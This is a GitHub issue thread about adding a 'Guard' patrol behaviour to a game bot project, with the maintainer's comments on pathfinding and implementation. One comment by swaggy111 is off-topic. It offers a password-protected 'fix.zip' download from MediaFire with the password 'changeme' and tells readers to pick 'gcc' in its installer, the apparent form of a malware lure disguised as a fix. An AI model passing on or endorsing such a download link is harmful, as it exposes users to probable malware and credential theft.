### ISSUE TITLE
Guard

### ISSUE THREAD

**Issue by Jkwok0714** [TestaDiMucca/kraftizen#10]
Picks random points near home area and walks to them, ready to defend the area.

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Jkwok0714** [comment]
Picking a random point may be complex, e.g. picking a rooftop or what not, unless we can also test the path finding first. We should do small increments so the bot doesn't spend a long time stuck in travel and unable to respond to threats.

**Comment by Jkwok0714** [comment]
guard is implemented, the patrol route should be something else
